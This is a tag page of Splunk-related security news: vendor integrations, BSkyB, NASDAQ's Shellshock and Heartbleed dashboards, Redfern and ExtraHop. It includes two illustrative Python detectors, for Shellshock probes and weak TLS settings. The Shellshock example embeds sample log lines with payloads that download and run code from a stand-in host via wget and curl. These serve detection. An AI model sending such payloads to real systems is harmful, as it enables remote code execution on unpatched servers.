Tag: Splunk Enterprise

Hewlett Packard Ventures participated in the Series A round of funding for Hexadite, whose core platform is an automated incident response technology. Security vendor Hexadite has raised $8 million in a Series...
WALTHAM, Mass., June 4th, 2015 - Digital Guardian, the only endpoint security platform purpose built to stop data theft, has released the Digital Guardian App for Splunk. The Digital Guardian App for Splunk harnesses the power of Splunk® Enterprise's big data analytics capabilities to more rapidly detect and respond to insider attacks and advanced threats targeting sensitive data. Digital Guardian solutions provide granular security event data on endpoints and servers (Windows, Mac OS X and Linux) for user behaviour and process activity, including information describing which users and processes are accessing and attempting to exfiltrate sensitive data, a key indicator of malicious activity.

Digital Guardian has also developed a Splunk Add-on to natively collect and export the full richness of Digital Guardian data into the Splunk App for Enterprise Security. This add-on is specific to Digital Guardian solutions, with dashboards on Data Classification, Data Egress, Advanced Threat Detection, Alerts, Events, Process Activity, and Operations.

With Splunk Enterprise, organisations can collect their data, enrich it and perform real-time analytics, so users can obtain full visibility across all departments and benefit from high-fidelity alerts. Splunk solutions can correlate Indicators of Compromise (IOCs) detected on the network and enable joint customers with Digital Guardian endpoint events to filter out false positives, immediately understand which endpoints have been infected by threats, and prioritise which alerts need immediate attention. Armed with this visibility, users can deploy Digital Guardian's real-time endpoint mitigation rules to block threats and quarantine systems before malicious code can propagate and sensitive data can be exfiltrated.
The Splunk platform now gives Digital Guardian the ability to improve incident response and mitigation times for customers. Download the Digital Guardian App for Splunk and Technology Add-on (TA) for Digital Guardian in Splunkbase, the Splunk app store.

Executive Perspective

"Digital Guardian's data goes beyond endpoint forensics to bring together what users and processes are doing with their most sensitive data on the endpoint," stated Jon Oltsik, senior principal analyst at the Enterprise Strategy Group. "Digital Guardian's heritage in data protection can help organisations align data security and security analytics, enhancing the cybersecurity purview of systems like the Splunk platform."

"Analysing machine data from security events on endpoint computers is an important part of the threat detection and response process, and security teams strengthen their security posture by using Splunk solutions to analyse this data collectively with all other data across the organisation," said Haiyan Song, senior vice president of security markets, Splunk. "The alliance between Splunk and Digital Guardian helps our joint customers obtain a greater level of Security Intelligence across organisations."

"We understand that customers can be inundated with alerts from multiple security systems. Digital Guardian believes the best way to reduce the threat surface for our customers is to provide them with actionable information about which threats are accessing their most sensitive data," said Doug Bailey, chief strategy officer at Digital Guardian. "With Digital Guardian's security event data now in Splunk Enterprise it makes attacks to sensitive data visible so customers can focus their efforts on stopping breaches."

About Digital Guardian

Digital Guardian is the only data-aware security platform designed to stop data theft.
The Digital Guardian platform performs across traditional endpoints, mobile devices and cloud applications to make it easier to see and stop all threats to sensitive data. For more than 10 years, it has enabled data-rich organisations to protect their most valuable assets with an on premise deployment or an outsourced managed security program (MSP). Digital Guardian's unique data awareness and transformative endpoint visibility, combined with behavioral threat detection and response, let you protect data without slowing the pace of your business. To learn more please visit https://digitalguardian.com

About Splunk Inc.

Splunk Inc. (NASDAQ: SPLK) provides the leading software platform for real-time Operational Intelligence. Splunk® software and cloud services enable organizations to search, monitor, analyze and visualize machine-generated big data coming from websites, applications, servers, networks, sensors and mobile devices. More than 9,500 enterprises, government agencies, universities and service providers in more than 100 countries use Splunk software to deepen business and customer understanding, mitigate cybersecurity risk, prevent fraud, improve service performance and reduce cost. Splunk products include Splunk® Enterprise, Splunk Cloud™, Hunk®, Splunk Light™, Splunk MINT and premium Splunk Apps. To learn more, please visit http://www.splunk.com/company.

Splunk, Splunk>, Listen to Your Data, The Engine for Machine Data, Hunk, Splunk Cloud, Splunk Light, SPL and Splunk MINT are trademarks and registered trademarks of Splunk Inc. in the United States and other countries.

Greg Funaro
Mobile: +1 978-239-8988
gfunaro@digitalguardian.com

Source: RealWire
British Sky Broadcasting (BSkyB) has deployed operational intelligence platform Splunk to monitor cyber attacks aimed at compromising Sky users' accounts. Mark Debney, principal engineer of developer operations at BSkyB, told Computing at splunk.conf in Las Vegas that BSkyB had created a range of in-house development tools a few years ago in an attempt at securing customer accounts. Those tools produced dashboards driven by behaviour-based rules, but with a raft of new services coming in, such as Now TV, Sky's capacity requirements were growing and the organisation had to decide on the best strategy for managing that growth.

"It was a case of either investing more money in a development team that could scale these security appliances or looking at another third party that could do the same sort of thing and that's when we stumbled across Splunk," Debney explains. The company also considered running Elasticsearch and Kibana on the backend and maintaining a development team to build apps on top, but Debney decided that Splunk was a better fit for Sky's needs. According to Debney, the Splunk proof of concept was put together swiftly on virtual machines. "Even then it performs really well so on dedicated hardware we're expecting really good things," he says.

The firm brought in a professional services firm to help with the transition from Sky's development tools to Splunk. "The [BSkyB] guys already had a good idea of what data was in the logs, what rules they wanted and it was pretty easy to translate what they had written in Java code for our own apps into Splunk," he says. The company is now looking into using more real-time dashboards to give visibility to its own development and security teams as well as teams from operation engineering, capacity management and monitoring.
"We want to be able to present the teams with nice dashboards to see what information they need without having to compromise the identity platform's own security," Debney says. Debney believes that Splunk will soon be used across BSkyB, with numerous departments already showing a keen interest in the platform. "I don't think it will be a hard sell, we've been approached by a number of areas within Sky that have looked at Splunk and they're asking us what our experience has been ... there has been a lot of talk about moving to Splunk. "Once we are set up with our two main use cases, I think there will be a big push to see what else we can use it for. If we can get people from the business to access the dashboards themselves then that would be fantastic and I think it's going to go in that direction," says Debney.
The American stock exchange NASDAQ is attempting to shield itself from the security vulnerability known as "Shellshock" or "The Bash Bug", with the help of operational intelligence platform Splunk. The flaw was found in Bash, the shell that ships with most Linux distributions and with Apple's Mac operating system, and it can be exploited to run arbitrary commands on any system that passes attacker-controlled input to Bash through environment variables, as CGI web scripts do. Although Linux and Unix vendors, as well as Apple, have released patches for the vulnerability, systems that have not yet been patched remain exposed, and recent reports suggest that similar Shellshock-like remote code execution is possible on Windows systems too.

At splunk.conf 2014 in Las Vegas, NASDAQ CISO Mark Graff told delegates that the company is using Splunk's platform in a bid to find and patch vulnerable systems before attackers can exploit them. The company had previously used Splunk to help with the Heartbleed bug, which was said to allow "anyone on the internet" to read the memory of systems protected by vulnerable versions of OpenSSL. When Heartbleed became public knowledge, Graff suggested, it became a race between attackers trying to make use of the flaw and defenders trying to patch it in time. NASDAQ built a dashboard using Splunk on the day that Heartbleed was made public. "We wrote it on the same day and ran it, and it's really fundamental to our defence," Graff explained. He said that NASDAQ's systems are always targeted with attacks, and in this case it had 500 outward-facing websites which were vulnerable. "We wanted to track if someone was coming after us and see which system they were trying to get into, and find out whether the system is vulnerable or not and whether it can be patched if it is," Graff said.
He presented the dashboard that one of NASDAQ's developers built using Splunk, with charts showing the number of vulnerable systems against the number of attacks, and a detector to highlight which systems could be hacked. "I knew they were going to come after us but the question was whether we could beat them," Graff said. The company eventually got its vulnerable systems patched and according to Graff, NASDAQ "beat" the attackers. The company will be using Splunk in a similar way to help it with Shellshock, which has been deemed "worse than Heartbleed". NASDAQ had initially implemented Splunk as a security information and event management (SIEM) tool, and is now working on refining its applications and the way it responds to intrusions. Graff said that he hopes "to get to the point where the enterprise will defend itself".
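The dashboards Graff describes correlate two feeds: attack attempts against outward-facing systems, and the patch status of those systems. As an added illustration of that correlation for Shellshock (this is not NASDAQ's dashboard and not Splunk code), the Python below runs it over a constructed web-server access log and a constructed patch inventory. It looks for the Bash function-definition pattern `() { ... };` that Shellshock (CVE-2014-6271) probes carry in HTTP headers such as User-Agent and Referer, counts attacks per target and per source, and lists the targeted hosts that are still unpatched. The log layout, host names, addresses and patch states are all assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample, not real traffic: Apache "combined" log lines with the
# virtual host (%v) prepended so each request can be tied to a system.
ACCESS_LOG = """\
www1.example.invalid 203.0.113.7 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x -O /tmp/x'"
www2.example.invalid 203.0.113.7 - - [25/Sep/2014:10:01:13 +0000] "GET /cgi-bin/status HTTP/1.1" 404 210 "() { :;}; echo vulnerable" "Mozilla/5.0"
www1.example.invalid 198.51.100.23 - - [25/Sep/2014:10:02:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
www3.example.invalid 203.0.113.7 - - [25/Sep/2014:10:03:01 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 500 0 "-" "() {:;}; /usr/bin/id"
www1.example.invalid 192.0.2.55 - - [25/Sep/2014:10:04:17 +0000] "POST /cgi-bin/login HTTP/1.1" 302 0 "-" "() { x; }; curl http://198.51.100.9/s | sh"
"""

# Constructed patch inventory (host -> Bash already patched?), standing in for
# the vulnerability-scan feed a real dashboard would correlate against.
PATCH_STATUS = {
    "www1.example.invalid": False,
    "www2.example.invalid": True,
    "www3.example.invalid": False,
}

# vhost, client, ident, user, [timestamp], "request", status, bytes, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Bash function definition smuggled in a header value: "() {", a body, "};".
# Vulnerable Bash executes whatever follows the closing brace when it imports
# the environment, which is what every Shellshock probe relies on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")


@dataclass
class Attack:
    vhost: str    # system the request was aimed at
    client: str   # source address
    field: str    # logged field that carried the payload
    payload: str


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_attacks(log_text):
    """Scan every request's header-derived fields for a Shellshock payload."""
    attacks = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("agent", "referer", "request"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                attacks.append(Attack(rec["vhost"], rec["client"], field, m.group(0)))
                break  # one hit per request is enough for counting
    return attacks


def triage(attacks, patch_status):
    """Cross attacks against patch status: who is attacking, which hosts are
    being hit, and which of those hosts could actually be exploited."""
    per_host = Counter(a.vhost for a in attacks)
    attackers = Counter(a.client for a in attacks)
    vulnerable = {host for host, patched in patch_status.items() if not patched}
    exposed = sorted(host for host in per_host if host in vulnerable)
    return {
        "attack_count": len(attacks),
        "vulnerable_count": len(vulnerable),
        "attacks_per_host": per_host,
        "attackers": attackers,
        "attacked_and_vulnerable": exposed,  # patch these first
    }


if __name__ == "__main__":
    report = triage(find_attacks(ACCESS_LOG), PATCH_STATUS)
    print(f"{report['attack_count']} attacks, {report['vulnerable_count']} unpatched hosts")
    for host, n in report["attacks_per_host"].most_common():
        state = "VULNERABLE" if host in report["attacked_and_vulnerable"] else "patched"
        print(f"  {host}: {n} attack(s), {state}")
    for client, n in report["attackers"].most_common():
        print(f"  source {client}: {n} attempt(s)")
```

The "attacked and vulnerable" list is the detector from Graff's dashboard: a host that is being probed but is already patched is noise, a host that is being probed and still runs an unpatched Bash is the one to fix now. The same logic in Splunk is roughly a search over the web index with `regex _raw="\(\)\s*\{"`, `stats count by vhost`, and a lookup against the patch inventory; the exact search depends on how the logs are indexed.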
Travel management company Redfern has deployed Splunk for proactive monitoring to comply with the government’s Information Assurance programme. Splunk was deployed to support a government contract through which Redfern is supplying a domestic travel booking service to UK government departments including HM Revenue and Customs, the Department of Education, Defra, the Department of Health and the Home Office.

Redfern deployed Splunk to monitor the critical infrastructure that underpins the Government Travel Booking Service. It is used to look for events in relation to unauthorised access or government data leaving the organisation. To meet the requirements of the contract, Usman Hamid, Redfern's head of IT, said the company needed to support GPG13 (Good Practice Guide 13, the CESG protective monitoring guidance) under the government’s Information Assurance (IA) initiative. He said: "Redfern did not have a central logging tool, but we knew Splunk could be used for basic monitoring." By implementing Splunk, Redfern was able to standardise on one set of tools, rather than implementing a specialist log monitoring tool, he said.

Hamid previously worked for shopping channel QVC, which trialled Splunk. He also saw how it was deployed at OnHotels.com, which implemented it for proactive monitoring and control. "We liked the way we could store all the data and use Splunk to present it back in a meaningful way," he said. "Splunk’s logging, searching, reporting and alerting technology was already well proven since it is widely used throughout local government and the Cabinet Office. Kevin Tunsley of EQALIS [Splunk’s leading UK partner] gave us a full demonstration of Splunk, the GPG13 compliance app and showed us its potential for providing complete operational visibility and intelligence. We were impressed by Splunk’s simplicity and flexibility to be more than just a monitoring solution." Hamid was also keen to use Splunk for operational management, which is how the tool is used at John Lewis.
He added: "Many people look at tools like Splunk only as a means of centralising all the logs from their IT estate into one place and then just leaving it, in effect a tick-box for compliance. What I saw in Splunk was the ability to actually harvest that data into something more meaningful, to allow for better decision-making through operational intelligence. We could track unique [customer] journeys in real time on the website by using Splunk in operations."

Redfern used EQALIS, an Accumuli company, to implement Splunk. The software was deployed in five days.
ExtraHop teams with Splunk to deliver a new compliance and security product for tracking wire data and using the Splunk operational intelligence platform. LAS VEGAS—ExtraHop Networks, a provider of analytics for wire data or data in motion, joined forces with Splunk to deliver a new compliance and security offering. The product provides pervasive, context-aware monitoring that imparts intelligent compliance and security, ExtraHop officials said.

The ExtraHop compliance and security offering provides correlated, cross-tier visibility and anomaly detection that complements intrusion prevention systems (IPS), intrusion detection systems (IDS) and Security Information and Event Management (SIEM) systems. Moreover, the new product is extensible and demonstrates the programmability and ease of ExtraHop integration with security platforms. In addition, ExtraHop’s integration with Splunk Enterprise transforms real-time security-related wire data into machine data for in-depth visualization, enabling IT, compliance, and security teams to easily pinpoint the system, application or infrastructure element in which a security event is occurring without using agents or offline packet capture.

ExtraHop demonstrated the compliance and security offering at Splunk .conf2013, Splunk’s annual user conference here. “As security threats, including zero-day attacks that exploit previously unknown vulnerabilities, become increasingly varied and sophisticated, real-time monitoring across all components of the application delivery chain is becoming a crucial first line of defense,” said Jesse Rothstein, CEO of ExtraHop, in a statement. “With the ExtraHop compliance and security solution and our integration with Splunk Enterprise, enterprise security teams are armed with a highly scalable solution designed to detect potential security events as they happen. With Splunk Enterprise, these anomalies can be easily visualized, enabling organizations to pinpoint the source before a serious breach occurs and prove that they have had adequate controls in place.”

The ExtraHop compliance and security solution delivers continuous, real-time auditing and anomaly detection across the entire application delivery chain, analyzing all wire data, including encrypted traffic, to deliver visibility and intelligence that mitigates risk and helps ensure compliance with both internal policies and regulations such as the Health Insurance Portability and Accountability Act (HIPAA), Payment Card Industry Data Security Standard (PCI-DSS) and Sarbanes-Oxley (SOX).

“Part of the answer to the seemingly insurmountable problem of how to identify attacks without signature-based mechanisms lies in pervasive monitoring to identify meaningful deviations from normal behavior to infer malicious intent,” wrote Neil MacDonald, vice president and Gartner Fellow, in his May 2013 report titled Prevention Is Futile in 2020: Protect Information Via Pervasive Monitoring and Collective Intelligence. “If you assume systems will be compromised with advanced targeted threats, then information security efforts need to shift to detailed, pervasive and context-aware monitoring to detect these threats.”

The ExtraHop compliance and security offering provides encryption auditing, which identifies all Secure Sockets Layer (SSL) transactions and certificates used by servers and clients, including those using weak keys and cipher suites, and tracks certificates that are about to expire for proactive remediation. Encryption auditing makes it easier to prove that all sensitive data is actually being encrypted in flight and that keys and ciphers are the correct strength.
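Encryption auditing of the kind described above boils down to checking, for every observed SSL/TLS session, that the negotiated protocol version, cipher suite and server key size are acceptable and that the server certificate is not about to expire. The Python below is an added example of those checks and is not ExtraHop's or Splunk's code. It takes constructed per-session records of the sort a wire-data sensor can extract from the handshake alone (the ServerHello's version and cipher suite, the Certificate message's key size and validity), so no decryption is needed, applies the rules, and reports findings per server. The thresholds, the weak-cipher token list, the record layout and the sample hosts are assumptions.

```python
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class TlsSession:
    client: str
    server: str
    protocol: str      # negotiated protocol version, e.g. "TLSv1.2"
    cipher: str        # negotiated cipher suite, IANA name
    key_bits: int      # server certificate public-key size
    not_after: date    # server certificate expiry


# Assumed policy. SSLv2/SSLv3 are broken; the tokens mark suites with no
# encryption, export-grade keys, anonymous key exchange, RC4, MD5 or single
# DES. "_DES_" deliberately does not match "_3DES_EDE_", which is a different
# (stronger) suite.
WEAK_PROTOCOLS = {"SSLv2", "SSLv3"}
WEAK_CIPHER_TOKENS = ("NULL", "EXPORT", "ANON", "RC4", "MD5", "_DES_")
MIN_KEY_BITS = 2048
EXPIRY_WARNING_DAYS = 30

# Constructed sample sessions, not captured traffic.
SESSIONS = [
    TlsSession("10.0.0.5", "api.example.invalid", "TLSv1.2",
               "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", 2048, date(2015, 3, 1)),
    TlsSession("10.0.0.6", "legacy.example.invalid", "SSLv3",
               "TLS_RSA_WITH_RC4_128_MD5", 1024, date(2014, 10, 20)),
    TlsSession("10.0.0.7", "pay.example.invalid", "TLSv1.0",
               "TLS_RSA_WITH_3DES_EDE_CBC_SHA", 2048, date(2014, 9, 15)),
    TlsSession("10.0.0.8", "legacy.example.invalid", "TLSv1.2",
               "TLS_RSA_WITH_AES_256_CBC_SHA", 1024, date(2014, 10, 20)),
]


def session_issues(s, today):
    """Return the set of policy violations for one observed session."""
    issues = set()
    if s.protocol in WEAK_PROTOCOLS:
        issues.add(f"weak-protocol {s.protocol}")
    if any(tok in s.cipher.upper() for tok in WEAK_CIPHER_TOKENS):
        issues.add(f"weak-cipher {s.cipher}")
    if s.key_bits < MIN_KEY_BITS:
        issues.add(f"weak-key {s.key_bits}")
    remaining = (s.not_after - today).days
    if remaining < 0:
        issues.add(f"expired {s.not_after.isoformat()}")
    elif remaining <= EXPIRY_WARNING_DAYS:
        issues.add(f"expiring {s.not_after.isoformat()}")
    return issues


def audit(sessions, today):
    """Aggregate violations per server; servers with no findings are omitted.
    Observing the same server from several clients merges the findings."""
    report = {}
    for s in sessions:
        found = session_issues(s, today)
        if found:
            report.setdefault(s.server, set()).update(found)
    return {server: sorted(issues) for server, issues in sorted(report.items())}


if __name__ == "__main__":
    for server, issues in audit(SESSIONS, date(2014, 10, 1)).items():
        print(server)
        for issue in issues:
            print("  -", issue)
```

Feeding this per-server table into Splunk gives the "prove it is encrypted properly" view the text describes; the same checks also surface the certificate that is about to expire before it takes a service down, which is the proactive remediation case. The audit date is passed in rather than read from the clock so that results are reproducible when replayed over historical wire data.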
Also, monitoring for locked-down virtual desktop environments enables users to track all ICA communications and provides continuous monitoring of any data passing over protected channels, with per-user and per-client details so that IT teams can identify users violating policy.

For example, ExtraHop continuously monitors VDI channels such as print and USB, and it sends an alert if any of these channels become active on unauthorized machines.
